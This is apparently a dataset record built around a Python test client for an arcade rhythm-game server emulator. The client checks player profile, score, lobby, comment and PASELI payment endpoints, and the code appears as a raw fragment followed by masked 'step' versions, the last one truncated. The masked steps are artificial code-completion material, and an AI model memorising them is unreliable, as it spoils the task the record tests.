if 'expected_combo' in expected:
expected_combo = expected['expected_combo']
else:
expected_combo = expected['combo']
if 'expected_miss_count' in expected:
expected_miss_count = expected['expected_miss_count']
else:
expected_miss_count = expected['miss_count']
if actual['score'] != expected_score:
raise Exception('Expected a score of \'{}\' for song \'{}\' chart \'{}\' but got score \'{}\''.format(
expected_score, expected['id'], expected['chart'], actual['score'],
))
if actual['achievement_rate'] != expected_achievement_rate:
raise Exception('Expected an achievement rate of \'{}\' for song \'{}\' chart \'{}\' but got achievement rate \'{}\''.format(
expected_achievement_rate, expected['id'], expected['chart'], actual['achievement_rate'],
))
if actual['clear_type'] != expected_clear_type:
raise Exception('Expected a clear_type of \'{}\' for song \'{}\' chart \'{}\' but got clear_type \'{}\''.format(
expected_clear_type, expected['id'], expected['chart'], actual['clear_type'],
))
if actual['combo'] != expected_combo:
raise Exception('Expected a combo of \'{}\' for song \'{}\' chart \'{}\' but got combo \'{}\''.format(
expected_combo, expected['id'], expected['chart'], actual['combo'],
))
if actual['miss_count'] != expected_miss_count:
raise Exception('Expected a miss count of \'{}\' for song \'{}\' chart \'{}\' but got miss count \'{}\''.format(
expected_miss_count, expected['id'], expected['chart'], actual['miss_count'],
))
# Sleep so we don't end up putting in score history on the same second
time.sleep(1)
else:
print("Skipping score checks for existing card")
# Verify ending game
self.verify_player_end(ref_id)
# Verify high score tables
self.verify_info_ranking()
# Verify paseli handling
if paseli_enabled:
print("PASELI enabled for this PCBID, executing PASELI checks")
else:
print("PASELI disabled for this PCBID, skipping PASELI checks")
return
sessid, balance = self.verify_eacoin_checkin(card)
if balance == 0:
print("Skipping PASELI consume check because card has 0 balance")
else:
self.verify_eacoin_consume(sessid, balance, random.randint(0, balance))
self.verify_eacoin_checkout(sessid)
|
normal
|
{
"blob_id": "f781377a52400abd617e7f0c5529726120b78476",
"index": 3426,
"step-1": "<mask token>\n\n\nclass ReflecBeatColette(BaseClient):\n <mask token>\n\n def verify_pcb_boot(self, loc: str) ->None:\n call = self.call_node()\n pcb = Node.void('pcb')\n pcb.set_attribute('method', 'boot')\n pcb.add_child(Node.string('lid', loc))\n call.add_child(pcb)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/pcb/sinfo/nm')\n self.assert_path(resp, 'response/pcb/sinfo/cl_enbl')\n self.assert_path(resp, 'response/pcb/sinfo/cl_h')\n self.assert_path(resp, 'response/pcb/sinfo/cl_m')\n <mask token>\n\n def verify_info_ranking(self) ->None:\n call = self.call_node()\n info = Node.void('info')\n info.set_attribute('method', 'ranking')\n info.add_child(Node.s32('ver', 0))\n call.add_child(info)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/info/ver')\n self.assert_path(resp, 'response/info/ranking/weekly/bt')\n self.assert_path(resp, 'response/info/ranking/weekly/et')\n self.assert_path(resp, 'response/info/ranking/weekly/new/d/mid')\n self.assert_path(resp, 'response/info/ranking/weekly/new/d/cnt')\n self.assert_path(resp, 'response/info/ranking/monthly/bt')\n self.assert_path(resp, 'response/info/ranking/monthly/et')\n self.assert_path(resp, 'response/info/ranking/monthly/new/d/mid')\n self.assert_path(resp, 'response/info/ranking/monthly/new/d/cnt')\n self.assert_path(resp, 'response/info/ranking/total/bt')\n self.assert_path(resp, 'response/info/ranking/total/et')\n self.assert_path(resp, 'response/info/ranking/total/new/d/mid')\n self.assert_path(resp, 'response/info/ranking/total/new/d/cnt')\n <mask token>\n\n def verify_player_delete(self, refid: str) ->None:\n call = self.call_node()\n player = Node.void('player')\n player.set_attribute('method', 'delete')\n player.add_child(Node.string('rid', refid))\n call.add_child(player)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/player')\n\n def verify_player_end(self, refid: str) ->None:\n call = self.call_node()\n player = Node.void('player')\n player.set_attribute('method', 'end')\n player.add_child(Node.string('rid', refid))\n call.add_child(player)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/player')\n\n def verify_player_succeed(self, refid: str) ->None:\n call = self.call_node()\n player = Node.void('player')\n player.set_attribute('method', 'succeed')\n player.add_child(Node.string('rid', refid))\n call.add_child(player)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/player/name')\n self.assert_path(resp, 'response/player/lv')\n self.assert_path(resp, 'response/player/exp')\n self.assert_path(resp, 'response/player/grd')\n self.assert_path(resp, 'response/player/ap')\n self.assert_path(resp, 'response/player/released')\n self.assert_path(resp, 'response/player/mrecord')\n\n def verify_player_read(self, refid: str, location: str) ->List[Dict[str,\n int]]:\n call = self.call_node()\n player = Node.void('player')\n player.set_attribute('method', 'read')\n player.add_child(Node.string('rid', refid))\n player.add_child(Node.string('lid', location))\n player.add_child(Node.s16('ver', 5))\n call.add_child(player)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/player/pdata/account/usrid')\n self.assert_path(resp, 'response/player/pdata/account/tpc')\n self.assert_path(resp, 'response/player/pdata/account/dpc')\n self.assert_path(resp, 'response/player/pdata/account/crd')\n self.assert_path(resp, 'response/player/pdata/account/brd')\n self.assert_path(resp, 'response/player/pdata/account/tdc')\n self.assert_path(resp, 'response/player/pdata/account/intrvld')\n self.assert_path(resp, 'response/player/pdata/account/ver')\n self.assert_path(resp, 'response/player/pdata/account/pst')\n self.assert_path(resp, 'response/player/pdata/account/st')\n self.assert_path(resp, 'response/player/pdata/base/name')\n self.assert_path(resp, 'response/player/pdata/base/exp')\n self.assert_path(resp, 'response/player/pdata/base/lv')\n self.assert_path(resp, 'response/player/pdata/base/mg')\n self.assert_path(resp, 'response/player/pdata/base/ap')\n self.assert_path(resp, 'response/player/pdata/base/tid')\n self.assert_path(resp, 'response/player/pdata/base/tname')\n self.assert_path(resp, 'response/player/pdata/base/cmnt')\n self.assert_path(resp, 'response/player/pdata/base/uattr')\n self.assert_path(resp, 'response/player/pdata/base/hidden_param')\n self.assert_path(resp, 'response/player/pdata/base/tbs')\n self.assert_path(resp, 'response/player/pdata/base/tbs_r')\n self.assert_path(resp, 'response/player/pdata/rival')\n self.assert_path(resp, 'response/player/pdata/fav_music_slot')\n self.assert_path(resp, 'response/player/pdata/custom')\n self.assert_path(resp, 'response/player/pdata/config')\n self.assert_path(resp, 'response/player/pdata/stamp')\n self.assert_path(resp, 'response/player/pdata/released')\n self.assert_path(resp, 'response/player/pdata/record')\n if resp.child_value('player/pdata/base/name') != self.NAME:\n raise Exception('Invalid name {} returned on profile read!'.\n format(resp.child_value('player/pdata/base/name')))\n scores = []\n for child in resp.child('player/pdata/record').children:\n if child.name != 'rec':\n continue\n score = {'id': child.child_value('mid'), 'chart': child.\n child_value('ntgrd'), 'clear_type': child.child_value('ct'),\n 'achievement_rate': child.child_value('ar'), 'score': child\n .child_value('scr'), 'combo': child.child_value('cmb'),\n 'miss_count': child.child_value('ms')}\n scores.append(score)\n return scores\n\n def verify_player_write(self, refid: str, loc: str, scores: List[Dict[\n str, int]]) ->int:\n call = self.call_node()\n player = Node.void('player')\n call.add_child(player)\n player.set_attribute('method', 'write')\n pdata = Node.void('pdata')\n player.add_child(pdata)\n account = Node.void('account')\n pdata.add_child(account)\n account.add_child(Node.s32('usrid', 0))\n account.add_child(Node.s32('plyid', 0))\n account.add_child(Node.s32('tpc', 1))\n account.add_child(Node.s32('dpc', 1))\n account.add_child(Node.s32('crd', 1))\n account.add_child(Node.s32('brd', 1))\n account.add_child(Node.s32('tdc', 1))\n account.add_child(Node.string('rid', refid))\n account.add_child(Node.string('lid', loc))\n account.add_child(Node.u8('mode', 0))\n account.add_child(Node.s16('ver', 5))\n account.add_child(Node.bool('pp', True))\n account.add_child(Node.bool('ps', True))\n account.add_child(Node.s16('pay', 0))\n account.add_child(Node.s16('pay_pc', 0))\n account.add_child(Node.u64('st', int(time.time() * 1000)))\n base = Node.void('base')\n pdata.add_child(base)\n base.add_child(Node.string('name', self.NAME))\n base.add_child(Node.s32('exp', 0))\n base.add_child(Node.s32('lv', 1))\n base.add_child(Node.s32('mg', -1))\n base.add_child(Node.s32('ap', -1))\n base.add_child(Node.s32_array('hidden_param', [0, 0, 0, 0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0, 2, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, \n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]))\n base.add_child(Node.bool('is_tut', True))\n stglog = Node.void('stglog')\n pdata.add_child(stglog)\n index = 0\n for score in scores:\n log = Node.void('log')\n stglog.add_child(log)\n log.add_child(Node.s8('stg', index))\n log.add_child(Node.s16('mid', score['id']))\n log.add_child(Node.s8('ng', score['chart']))\n log.add_child(Node.s8('col', 0))\n log.add_child(Node.s8('mt', 7))\n log.add_child(Node.s8('rt', 0))\n log.add_child(Node.s8('ct', score['clear_type']))\n log.add_child(Node.s16('grd', 0))\n log.add_child(Node.s16('ar', score['achievement_rate']))\n log.add_child(Node.s16('sc', score['score']))\n log.add_child(Node.s16('jt_jst', 0))\n log.add_child(Node.s16('jt_grt', 0))\n log.add_child(Node.s16('jt_gd', 0))\n log.add_child(Node.s16('jt_ms', score['miss_count']))\n log.add_child(Node.s16('jt_jr', 0))\n log.add_child(Node.s16('cmb', score['combo']))\n log.add_child(Node.s16('exp', 0))\n log.add_child(Node.s32('r_uid', 0))\n log.add_child(Node.s32('r_plyid', 0))\n log.add_child(Node.s8('r_stg', 0))\n log.add_child(Node.s8('r_ct', -1))\n log.add_child(Node.s16('r_sc', 0))\n log.add_child(Node.s16('r_grd', 0))\n log.add_child(Node.s16('r_ar', 0))\n log.add_child(Node.s8('r_cpuid', -1))\n log.add_child(Node.s32('time', int(time.time())))\n log.add_child(Node.s8('decide', 0))\n index = index + 1\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/player/uid')\n return resp.child_value('player/uid')\n <mask token>\n\n def verify_lobby_entry(self, location: str, extid: int) ->int:\n call = self.call_node()\n lobby = Node.void('lobby')\n lobby.set_attribute('method', 'entry')\n e = Node.void('e')\n lobby.add_child(e)\n e.add_child(Node.s32('eid', 0))\n e.add_child(Node.u16('mid', 79))\n e.add_child(Node.u8('ng', 0))\n e.add_child(Node.s32('uid', extid))\n e.add_child(Node.s32('uattr', 0))\n e.add_child(Node.string('pn', self.NAME))\n e.add_child(Node.s16('mg', 255))\n e.add_child(Node.s32('mopt', 0))\n e.add_child(Node.s32('tid', 0))\n e.add_child(Node.string('tn', ''))\n e.add_child(Node.s32('topt', 0))\n e.add_child(Node.string('lid', location))\n e.add_child(Node.string('sn', ''))\n e.add_child(Node.u8('pref', 51))\n e.add_child(Node.s8('stg', 4))\n e.add_child(Node.s8('pside', 0))\n e.add_child(Node.s16('eatime', 30))\n e.add_child(Node.u8_array('ga', [127, 0, 0, 1]))\n e.add_child(Node.u16('gp', 10007))\n e.add_child(Node.u8_array('la', [16, 0, 0, 0]))\n e.add_child(Node.u8('ver', 5))\n lobby.add_child(Node.s32_array('friend', []))\n call.add_child(lobby)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/lobby/interval')\n self.assert_path(resp, 'response/lobby/interval_p')\n self.assert_path(resp, 'response/lobby/eid')\n self.assert_path(resp, 'response/lobby/e/eid')\n self.assert_path(resp, 'response/lobby/e/mid')\n self.assert_path(resp, 'response/lobby/e/ng')\n self.assert_path(resp, 'response/lobby/e/uid')\n self.assert_path(resp, 'response/lobby/e/uattr')\n self.assert_path(resp, 'response/lobby/e/pn')\n self.assert_path(resp, 'response/lobby/e/mg')\n self.assert_path(resp, 'response/lobby/e/mopt')\n self.assert_path(resp, 'response/lobby/e/tid')\n self.assert_path(resp, 'response/lobby/e/tn')\n self.assert_path(resp, 'response/lobby/e/topt')\n self.assert_path(resp, 'response/lobby/e/lid')\n self.assert_path(resp, 'response/lobby/e/sn')\n self.assert_path(resp, 'response/lobby/e/pref')\n self.assert_path(resp, 'response/lobby/e/stg')\n self.assert_path(resp, 'response/lobby/e/pside')\n self.assert_path(resp, 'response/lobby/e/eatime')\n self.assert_path(resp, 'response/lobby/e/ga')\n self.assert_path(resp, 'response/lobby/e/gp')\n self.assert_path(resp, 'response/lobby/e/la')\n self.assert_path(resp, 'response/lobby/e/ver')\n return resp.child_value('lobby/eid')\n\n def verify_lobby_delete(self, eid: int) ->None:\n call = self.call_node()\n lobby = Node.void('lobby')\n lobby.set_attribute('method', 'delete')\n lobby.add_child(Node.s32('eid', eid))\n call.add_child(lobby)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/lobby')\n\n def verify_pzlcmt_read(self, extid: int) ->None:\n call = self.call_node()\n info = Node.void('info')\n info.set_attribute('method', 'pzlcmt_read')\n info.add_child(Node.s32('uid', extid))\n info.add_child(Node.s32('tid', 0))\n info.add_child(Node.s32('time', 0))\n info.add_child(Node.s32('limit', 30))\n call.add_child(info)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/info/comment/time')\n self.assert_path(resp, 'response/info/c/uid')\n self.assert_path(resp, 'response/info/c/name')\n self.assert_path(resp, 'response/info/c/icon')\n self.assert_path(resp, 'response/info/c/bln')\n self.assert_path(resp, 'response/info/c/tid')\n self.assert_path(resp, 'response/info/c/t_name')\n self.assert_path(resp, 'response/info/c/pref')\n self.assert_path(resp, 'response/info/c/time')\n self.assert_path(resp, 'response/info/c/comment')\n self.assert_path(resp, 'response/info/c/is_tweet')\n found = False\n for child in resp.child('info').children:\n if child.name != 'c':\n continue\n if child.child_value('uid') == extid:\n name = child.child_value('name')\n comment = child.child_value('comment')\n if name != self.NAME:\n raise Exception(\"Invalid name '{}' returned for comment!\"\n .format(name))\n if comment != 'アメ〜〜!':\n raise Exception(\n \"Invalid comment '{}' returned for comment!\".format\n (comment))\n found = True\n if not found:\n raise Exception('Comment we posted was not found!')\n <mask token>\n\n def verify_jbrbcollabo_save(self, refid: str) ->None:\n call = self.call_node()\n jbrbcollabo = Node.void('jbrbcollabo')\n jbrbcollabo.set_attribute('method', 'save')\n jbrbcollabo.add_child(Node.string('ref_id', refid))\n jbrbcollabo.add_child(Node.u16('cre_count', 0))\n call.add_child(jbrbcollabo)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/jbrbcollabo')\n\n def verify(self, cardid: Optional[str]) ->None:\n self.verify_services_get(expected_services=['pcbtracker',\n 'pcbevent', 'local', 'message', 'facility', 'cardmng',\n 'package', 'posevent', 'pkglist', 'dlstatus', 'eacoin', 'lobby',\n 'ntp', 'keepalive'])\n paseli_enabled = self.verify_pcbtracker_alive()\n self.verify_message_get()\n self.verify_package_list()\n location = self.verify_facility_get()\n self.verify_pcbevent_put()\n self.verify_pcb_boot(location)\n self.verify_info_common()\n if cardid is not None:\n card = cardid\n else:\n card = self.random_card()\n print('Generated random card ID {} for use.'.format(card))\n if cardid is None:\n self.verify_cardmng_inquire(card, msg_type='unregistered',\n paseli_enabled=paseli_enabled)\n ref_id = self.verify_cardmng_getrefid(card)\n if len(ref_id) != 16:\n raise Exception(\n \"Invalid refid '{}' returned when registering card\".\n format(ref_id))\n if ref_id != self.verify_cardmng_inquire(card, msg_type='new',\n paseli_enabled=paseli_enabled):\n raise Exception(\n \"Invalid refid '{}' returned when querying card\".format\n (ref_id))\n self.verify_player_start(ref_id)\n self.verify_player_delete(ref_id)\n self.verify_player_succeed(ref_id)\n extid = self.verify_player_write(ref_id, location, [{'id': 0,\n 'chart': 0, 'clear_type': -1, 'achievement_rate': 0,\n 'score': 0, 'combo': 0, 'miss_count': 0}])\n else:\n print('Skipping new card checks for existing card')\n ref_id = self.verify_cardmng_inquire(card, msg_type='query',\n paseli_enabled=paseli_enabled)\n self.verify_cardmng_authpass(ref_id, correct=True)\n self.verify_cardmng_authpass(ref_id, correct=False)\n if ref_id != self.verify_cardmng_inquire(card, msg_type='query',\n paseli_enabled=paseli_enabled):\n raise Exception(\"Invalid refid '{}' returned when querying card\"\n .format(ref_id))\n self.verify_lobby_read(location, extid)\n eid = self.verify_lobby_entry(location, extid)\n self.verify_lobby_delete(eid)\n self.verify_pzlcmt_write(extid)\n self.verify_pzlcmt_read(extid)\n self.verify_jbrbcollabo_save(ref_id)\n if cardid is None:\n for phase in [1, 2]:\n if phase == 1:\n dummyscores = [{'id': 1, 'chart': 1, 'clear_type': 2,\n 'achievement_rate': 7543, 'score': 432, 'combo': \n 123, 'miss_count': 5}, {'id': 1, 'chart': 0,\n 'clear_type': 4, 'achievement_rate': 9876, 'score':\n 543, 'combo': 543, 'miss_count': 0}, {'id': 3,\n 'chart': 2, 'clear_type': 2, 'achievement_rate': \n 1234, 'score': 123, 'combo': 42, 'miss_count': 54},\n {'id': 3, 'chart': 0, 'clear_type': 2,\n 'achievement_rate': 1024, 'score': 50, 'combo': 12,\n 'miss_count': 90}]\n if phase == 2:\n dummyscores = [{'id': 1, 'chart': 1, 'clear_type': 3,\n 'achievement_rate': 8765, 'score': 469, 'combo': \n 468, 'miss_count': 1}, {'id': 1, 'chart': 0,\n 'clear_type': 2, 'achievement_rate': 8765, 'score':\n 432, 'combo': 321, 'miss_count': 15,\n 'expected_score': 543, 'expected_clear_type': 4,\n 'expected_achievement_rate': 9876, 'expected_combo':\n 543, 'expected_miss_count': 0}]\n self.verify_player_write(ref_id, location, dummyscores)\n scores = self.verify_player_read(ref_id, location)\n for expected in dummyscores:\n actual = None\n for received in scores:\n if received['id'] == expected['id'] and received[\n 'chart'] == expected['chart']:\n actual = received\n break\n if actual is None:\n raise Exception(\n \"Didn't find song {} chart {} in response!\".\n format(expected['id'], expected['chart']))\n if 'expected_score' in expected:\n expected_score = expected['expected_score']\n else:\n expected_score = expected['score']\n if 'expected_achievement_rate' in expected:\n expected_achievement_rate = expected[\n 'expected_achievement_rate']\n else:\n expected_achievement_rate = expected['achievement_rate'\n ]\n if 'expected_clear_type' in expected:\n expected_clear_type = expected['expected_clear_type']\n else:\n expected_clear_type = expected['clear_type']\n if 'expected_combo' in expected:\n expected_combo = expected['expected_combo']\n else:\n expected_combo = expected['combo']\n if 'expected_miss_count' in expected:\n expected_miss_count = expected['expected_miss_count']\n else:\n expected_miss_count = expected['miss_count']\n if actual['score'] != expected_score:\n raise Exception(\n \"Expected a score of '{}' for song '{}' chart '{}' but got score '{}'\"\n .format(expected_score, expected['id'],\n expected['chart'], actual['score']))\n if actual['achievement_rate'] != expected_achievement_rate:\n raise Exception(\n \"Expected an achievement rate of '{}' for song '{}' chart '{}' but got achievement rate '{}'\"\n .format(expected_achievement_rate, expected[\n 'id'], expected['chart'], actual[\n 'achievement_rate']))\n if actual['clear_type'] != expected_clear_type:\n raise Exception(\n \"Expected a clear_type of '{}' for song '{}' chart '{}' but got clear_type '{}'\"\n .format(expected_clear_type, expected['id'],\n expected['chart'], actual['clear_type']))\n if actual['combo'] != expected_combo:\n raise Exception(\n \"Expected a combo of '{}' for song '{}' chart '{}' but got combo '{}'\"\n .format(expected_combo, expected['id'],\n expected['chart'], actual['combo']))\n if actual['miss_count'] != expected_miss_count:\n raise Exception(\n \"Expected a miss count of '{}' for song '{}' chart '{}' but got miss count '{}'\"\n .format(expected_miss_count, expected['id'],\n expected['chart'], actual['miss_count']))\n time.sleep(1)\n else:\n print('Skipping score checks for existing card')\n self.verify_player_end(ref_id)\n self.verify_info_ranking()\n if paseli_enabled:\n print('PASELI enabled for this PCBID, executing PASELI checks')\n else:\n print('PASELI disabled for this PCBID, skipping PASELI checks')\n return\n sessid, balance = self.verify_eacoin_checkin(card)\n if balance == 0:\n print('Skipping PASELI consume check because card has 0 balance')\n else:\n self.verify_eacoin_consume(sessid, balance, random.randint(0,\n balance))\n self.verify_eacoin_checkout(sessid)\n",
"step-2": "<mask token>\n\n\nclass ReflecBeatColette(BaseClient):\n <mask token>\n\n def verify_pcb_boot(self, loc: str) ->None:\n call = self.call_node()\n pcb = Node.void('pcb')\n pcb.set_attribute('method', 'boot')\n pcb.add_child(Node.string('lid', loc))\n call.add_child(pcb)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/pcb/sinfo/nm')\n self.assert_path(resp, 'response/pcb/sinfo/cl_enbl')\n self.assert_path(resp, 'response/pcb/sinfo/cl_h')\n self.assert_path(resp, 'response/pcb/sinfo/cl_m')\n\n def verify_info_common(self) ->None:\n call = self.call_node()\n info = Node.void('info')\n info.set_attribute('method', 'common')\n call.add_child(info)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/info/event_ctrl')\n self.assert_path(resp, 'response/info/item_lock_ctrl')\n\n def verify_info_ranking(self) ->None:\n call = self.call_node()\n info = Node.void('info')\n info.set_attribute('method', 'ranking')\n info.add_child(Node.s32('ver', 0))\n call.add_child(info)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/info/ver')\n self.assert_path(resp, 'response/info/ranking/weekly/bt')\n self.assert_path(resp, 'response/info/ranking/weekly/et')\n self.assert_path(resp, 'response/info/ranking/weekly/new/d/mid')\n self.assert_path(resp, 'response/info/ranking/weekly/new/d/cnt')\n self.assert_path(resp, 'response/info/ranking/monthly/bt')\n self.assert_path(resp, 'response/info/ranking/monthly/et')\n self.assert_path(resp, 'response/info/ranking/monthly/new/d/mid')\n self.assert_path(resp, 'response/info/ranking/monthly/new/d/cnt')\n self.assert_path(resp, 'response/info/ranking/total/bt')\n self.assert_path(resp, 'response/info/ranking/total/et')\n self.assert_path(resp, 'response/info/ranking/total/new/d/mid')\n self.assert_path(resp, 'response/info/ranking/total/new/d/cnt')\n <mask token>\n\n def verify_player_delete(self, refid: str) ->None:\n call = self.call_node()\n player = Node.void('player')\n player.set_attribute('method', 'delete')\n player.add_child(Node.string('rid', refid))\n call.add_child(player)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/player')\n\n def verify_player_end(self, refid: str) ->None:\n call = self.call_node()\n player = Node.void('player')\n player.set_attribute('method', 'end')\n player.add_child(Node.string('rid', refid))\n call.add_child(player)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/player')\n\n def verify_player_succeed(self, refid: str) ->None:\n call = self.call_node()\n player = Node.void('player')\n player.set_attribute('method', 'succeed')\n player.add_child(Node.string('rid', refid))\n call.add_child(player)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/player/name')\n self.assert_path(resp, 'response/player/lv')\n self.assert_path(resp, 'response/player/exp')\n self.assert_path(resp, 'response/player/grd')\n self.assert_path(resp, 'response/player/ap')\n self.assert_path(resp, 'response/player/released')\n self.assert_path(resp, 'response/player/mrecord')\n\n def verify_player_read(self, refid: str, location: str) ->List[Dict[str,\n int]]:\n call = self.call_node()\n player = Node.void('player')\n player.set_attribute('method', 'read')\n player.add_child(Node.string('rid', refid))\n player.add_child(Node.string('lid', location))\n player.add_child(Node.s16('ver', 5))\n call.add_child(player)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/player/pdata/account/usrid')\n self.assert_path(resp, 'response/player/pdata/account/tpc')\n self.assert_path(resp, 'response/player/pdata/account/dpc')\n self.assert_path(resp, 'response/player/pdata/account/crd')\n self.assert_path(resp, 'response/player/pdata/account/brd')\n self.assert_path(resp, 'response/player/pdata/account/tdc')\n self.assert_path(resp, 'response/player/pdata/account/intrvld')\n self.assert_path(resp, 'response/player/pdata/account/ver')\n self.assert_path(resp, 'response/player/pdata/account/pst')\n self.assert_path(resp, 'response/player/pdata/account/st')\n self.assert_path(resp, 'response/player/pdata/base/name')\n self.assert_path(resp, 'response/player/pdata/base/exp')\n self.assert_path(resp, 'response/player/pdata/base/lv')\n self.assert_path(resp, 'response/player/pdata/base/mg')\n self.assert_path(resp, 'response/player/pdata/base/ap')\n self.assert_path(resp, 'response/player/pdata/base/tid')\n self.assert_path(resp, 'response/player/pdata/base/tname')\n self.assert_path(resp, 'response/player/pdata/base/cmnt')\n self.assert_path(resp, 'response/player/pdata/base/uattr')\n self.assert_path(resp, 'response/player/pdata/base/hidden_param')\n self.assert_path(resp, 'response/player/pdata/base/tbs')\n self.assert_path(resp, 'response/player/pdata/base/tbs_r')\n self.assert_path(resp, 'response/player/pdata/rival')\n self.assert_path(resp, 'response/player/pdata/fav_music_slot')\n self.assert_path(resp, 'response/player/pdata/custom')\n self.assert_path(resp, 'response/player/pdata/config')\n self.assert_path(resp, 'response/player/pdata/stamp')\n self.assert_path(resp, 'response/player/pdata/released')\n self.assert_path(resp, 'response/player/pdata/record')\n if resp.child_value('player/pdata/base/name') != self.NAME:\n raise Exception('Invalid name {} returned on profile read!'.\n format(resp.child_value('player/pdata/base/name')))\n scores = []\n for child in resp.child('player/pdata/record').children:\n if child.name != 'rec':\n continue\n score = {'id': child.child_value('mid'), 'chart': child.\n child_value('ntgrd'), 'clear_type': child.child_value('ct'),\n 'achievement_rate': child.child_value('ar'), 'score': child\n .child_value('scr'), 'combo': child.child_value('cmb'),\n 'miss_count': child.child_value('ms')}\n scores.append(score)\n return scores\n\n def verify_player_write(self, refid: str, loc: str, scores: List[Dict[\n str, int]]) ->int:\n call = self.call_node()\n player = Node.void('player')\n call.add_child(player)\n player.set_attribute('method', 'write')\n pdata = Node.void('pdata')\n player.add_child(pdata)\n account = Node.void('account')\n pdata.add_child(account)\n account.add_child(Node.s32('usrid', 0))\n account.add_child(Node.s32('plyid', 0))\n account.add_child(Node.s32('tpc', 1))\n account.add_child(Node.s32('dpc', 1))\n account.add_child(Node.s32('crd', 1))\n account.add_child(Node.s32('brd', 1))\n account.add_child(Node.s32('tdc', 1))\n account.add_child(Node.string('rid', refid))\n account.add_child(Node.string('lid', loc))\n account.add_child(Node.u8('mode', 0))\n account.add_child(Node.s16('ver', 5))\n account.add_child(Node.bool('pp', True))\n account.add_child(Node.bool('ps', True))\n account.add_child(Node.s16('pay', 0))\n account.add_child(Node.s16('pay_pc', 0))\n account.add_child(Node.u64('st', int(time.time() * 1000)))\n base = Node.void('base')\n pdata.add_child(base)\n base.add_child(Node.string('name', self.NAME))\n base.add_child(Node.s32('exp', 0))\n base.add_child(Node.s32('lv', 1))\n base.add_child(Node.s32('mg', -1))\n base.add_child(Node.s32('ap', -1))\n base.add_child(Node.s32_array('hidden_param', [0, 0, 0, 0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0, 2, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, \n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]))\n base.add_child(Node.bool('is_tut', True))\n stglog = Node.void('stglog')\n pdata.add_child(stglog)\n index = 0\n for score in scores:\n log = Node.void('log')\n stglog.add_child(log)\n log.add_child(Node.s8('stg', index))\n log.add_child(Node.s16('mid', score['id']))\n log.add_child(Node.s8('ng', score['chart']))\n log.add_child(Node.s8('col', 0))\n log.add_child(Node.s8('mt', 7))\n log.add_child(Node.s8('rt', 0))\n log.add_child(Node.s8('ct', score['clear_type']))\n log.add_child(Node.s16('grd', 0))\n log.add_child(Node.s16('ar', score['achievement_rate']))\n log.add_child(Node.s16('sc', score['score']))\n log.add_child(Node.s16('jt_jst', 0))\n log.add_child(Node.s16('jt_grt', 0))\n log.add_child(Node.s16('jt_gd', 0))\n log.add_child(Node.s16('jt_ms', score['miss_count']))\n log.add_child(Node.s16('jt_jr', 0))\n log.add_child(Node.s16('cmb', score['combo']))\n log.add_child(Node.s16('exp', 0))\n log.add_child(Node.s32('r_uid', 0))\n log.add_child(Node.s32('r_plyid', 0))\n log.add_child(Node.s8('r_stg', 0))\n log.add_child(Node.s8('r_ct', -1))\n log.add_child(Node.s16('r_sc', 0))\n log.add_child(Node.s16('r_grd', 0))\n log.add_child(Node.s16('r_ar', 0))\n log.add_child(Node.s8('r_cpuid', -1))\n log.add_child(Node.s32('time', int(time.time())))\n log.add_child(Node.s8('decide', 0))\n index = index + 1\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/player/uid')\n return resp.child_value('player/uid')\n <mask token>\n\n def verify_lobby_entry(self, location: str, extid: int) ->int:\n call = self.call_node()\n lobby = Node.void('lobby')\n lobby.set_attribute('method', 'entry')\n e = Node.void('e')\n lobby.add_child(e)\n e.add_child(Node.s32('eid', 0))\n e.add_child(Node.u16('mid', 79))\n e.add_child(Node.u8('ng', 0))\n e.add_child(Node.s32('uid', extid))\n e.add_child(Node.s32('uattr', 0))\n e.add_child(Node.string('pn', self.NAME))\n e.add_child(Node.s16('mg', 255))\n e.add_child(Node.s32('mopt', 0))\n e.add_child(Node.s32('tid', 0))\n e.add_child(Node.string('tn', ''))\n e.add_child(Node.s32('topt', 0))\n e.add_child(Node.string('lid', location))\n e.add_child(Node.string('sn', ''))\n e.add_child(Node.u8('pref', 51))\n e.add_child(Node.s8('stg', 4))\n e.add_child(Node.s8('pside', 0))\n e.add_child(Node.s16('eatime', 30))\n e.add_child(Node.u8_array('ga', [127, 0, 0, 1]))\n e.add_child(Node.u16('gp', 10007))\n e.add_child(Node.u8_array('la', [16, 0, 0, 0]))\n e.add_child(Node.u8('ver', 5))\n lobby.add_child(Node.s32_array('friend', []))\n call.add_child(lobby)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/lobby/interval')\n self.assert_path(resp, 'response/lobby/interval_p')\n self.assert_path(resp, 'response/lobby/eid')\n self.assert_path(resp, 'response/lobby/e/eid')\n self.assert_path(resp, 'response/lobby/e/mid')\n self.assert_path(resp, 'response/lobby/e/ng')\n self.assert_path(resp, 'response/lobby/e/uid')\n self.assert_path(resp, 'response/lobby/e/uattr')\n self.assert_path(resp, 'response/lobby/e/pn')\n self.assert_path(resp, 'response/lobby/e/mg')\n self.assert_path(resp, 'response/lobby/e/mopt')\n self.assert_path(resp, 'response/lobby/e/tid')\n self.assert_path(resp, 'response/lobby/e/tn')\n self.assert_path(resp, 'response/lobby/e/topt')\n self.assert_path(resp, 'response/lobby/e/lid')\n self.assert_path(resp, 'response/lobby/e/sn')\n 